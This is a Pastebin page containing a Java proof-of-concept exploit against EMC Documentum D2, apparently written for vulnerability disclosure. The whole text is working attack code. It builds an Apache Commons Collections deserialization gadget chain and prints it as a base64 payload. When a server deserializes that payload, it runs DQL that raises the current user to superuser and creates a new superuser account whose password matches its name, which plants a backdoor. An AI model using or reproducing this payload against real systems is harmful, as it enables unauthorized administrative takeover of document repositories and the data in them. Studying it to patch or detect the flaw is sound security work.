Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import java.io.ByteArrayOutputStream;
- import java.io.ObjectOutputStream;
- import java.lang.reflect.Array;
- import java.lang.reflect.Field;
- import java.lang.reflect.InvocationHandler;
- import java.lang.reflect.Method;
- import java.lang.reflect.Proxy;
- import java.util.HashMap;
- import java.util.Map;
- import org.apache.commons.collections.Transformer;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.map.LazyMap;
- import com.documentum.fc.client.impl.typeddata.DynamicallyTypedData;
- import com.documentum.fc.client.impl.typeddata.ITypedData;
- import com.documentum.fc.common.DfId;
- import com.documentum.fc.common.IDfId;
- import com.documentum.fc.impl.RuntimeContext;
- import com.documentum.xerces_2_8_0.xerces.impl.dv.util.Base64;
- import com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl;
- /**
- * @author Andrey B. Panfilov <andrey@panfilov.tel>
- */
- public class DocumentumD2AACBackDoorPoC {
- @SuppressWarnings("unchecked")
- public static void main(String[] args) throws Exception {
- if (args.length != 2) {
- System.out.println("Usage: java " + DocumentumD2AACBackDoorPoC.class.getName() + " docbase username");
- return;
- }
- String docbaseName = args[0];
- String userName = args[1];
- ITypedData becomeSuperUserQuery = new DynamicallyTypedData();
- becomeSuperUserQuery.appendString("QUERY",
- "UPDATE dm_dbo.dm_user_s SET user_privileges=16, i_vstamp=i_vstamp+1 WHERE user_name=USER");
- ITypedData createUserQuery = new DynamicallyTypedData();
- createUserQuery.appendString("QUERY",
- "CREATE dm_user object SET user_name='" + userName + "', SET user_login_name='" + userName
- + "', SET user_source='inline password', SET user_password='" + userName
- + "', SET user_privileges=16");
- ITypedData createRegisteredQuery = new DynamicallyTypedData();
- createRegisteredQuery.appendBoolean("IS_NEW_OBJECT", true);
- createRegisteredQuery.appendString("OBJECT_TYPE", "DM_REGISTERED");
- createRegisteredQuery.appendInt("i_vstamp", 0);
- createRegisteredQuery.appendString("table_name", "dm_user_s");
- createRegisteredQuery.appendString("table_owner", docbaseName);
- createRegisteredQuery.appendString("owner_name", docbaseName);
- createRegisteredQuery.appendInt("world_permit", 7);
- createRegisteredQuery.appendString("object_name", "dm_user_s");
- createRegisteredQuery.appendInt("owner_table_permit", 15);
- createRegisteredQuery.appendInt("group_table_permit", 15);
- createRegisteredQuery.appendInt("world_table_permit", 15);
- createRegisteredQuery.appendString("r_object_type", "dm_registered");
- Transformer getSession = new ChainedTransformer(
- new Transformer[] { new ConstantTransformer(RuntimeContext.class),
- new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class },
- new Object[] { "getInstance", new Class[0] }),
- new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class },
- new Object[] { null, new Object[0] }),
- new InvokerTransformer("getSessionRegistry", new Class[0], new Object[0]),
- new InvokerTransformer("getAllSessions", new Class[0], new Object[0]),
- new InvokerTransformer("get", new Class[] { int.class }, new Object[] { 0 }), });
- Transformer flushGlobalCache = new ChainedTransformer(new Transformer[] { getSession,
- new InvokerTransformer("flushGlobalCache", new Class[] { String.class }, new Object[] { "user" }) });
- Transformer getDocbaseAPI = new ChainedTransformer(
- new Transformer[] { getSession, new InvokerTransformer("getDocbaseApi", new Class[0], new Object[0]) });
- Transformer createUser = new ChainedTransformer(new Transformer[] { getDocbaseAPI,
- new InvokerTransformer("parameterizedApply",
- new Class[] { String.class, IDfId.class, ITypedData.class, boolean.class },
- new Object[] { "EXEC", DfId.DF_NULLID, createUserQuery, false }),
- new ConstantTransformer(null) });
- Transformer becomeSuperUser = new ChainedTransformer(new Transformer[] { getDocbaseAPI,
- new InvokerTransformer("parameterizedApply",
- new Class[] { String.class, IDfId.class, ITypedData.class, boolean.class },
- new Object[] { "EXEC", DfId.DF_NULLID, becomeSuperUserQuery, false }),
- new ConstantTransformer(null) });
- Transformer createRegistered = new ChainedTransformer(
- new Transformer[] { getDocbaseAPI,
- new InvokerTransformer("parameterizedApply", new Class[] { String.class, IDfId.class,
- ITypedData.class, boolean.class },
- new Object[] { "SysObjSave", new DfId("1900000080000001"), createRegisteredQuery, false }),
- new ConstantTransformer(null) });
- Map innerMap = new HashMap();
- Map lazyMap = LazyMap.decorate(innerMap, new ChainedTransformer(
- new Transformer[] { createRegistered, becomeSuperUser, flushGlobalCache, createUser }));
- CompositeInvocationHandlerImpl handler = new CompositeInvocationHandlerImpl();
- handler.setDefaultHandler(new InvocationHandler() {
- public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
- return method.invoke(new HashMap(), args);
- }
- });
- // lazyMap.get(null);
- Map<Object, Object> result = new HashMap<Object, Object>();
- result.put(createProxy(handler, Map.class), null);
- setFieldValue(handler, "classToInvocationHandler", lazyMap);
- handler.setDefaultHandler(null);
- ByteArrayOutputStream baos = new ByteArrayOutputStream();
- ObjectOutputStream oos = new ObjectOutputStream(baos);
- oos.writeObject(result);
- oos.flush();
- byte[] bytes = baos.toByteArray();
- String payload = Base64.encode(bytes);
- System.out.println(payload);
- }
- public static <T> T createProxy(final InvocationHandler ih, final Class<T> iface, final Class<?>... ifaces) {
- final Class<?>[] allIfaces = (Class<?>[]) Array.newInstance(Class.class, ifaces.length + 1);
- allIfaces[0] = iface;
- if (ifaces.length > 0) {
- System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length);
- }
- return iface.cast(Proxy.newProxyInstance(DocumentumD2AACBackDoorPoC.class.getClassLoader(), allIfaces, ih));
- }
- public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
- Field field = clazz.getDeclaredField(fieldName);
- if (field == null && clazz.getSuperclass() != null) {
- field = getField(clazz.getSuperclass(), fieldName);
- }
- field.setAccessible(true);
- return field;
- }
- public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
- final Field field = getField(obj.getClass(), fieldName);
- field.set(obj, value);
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement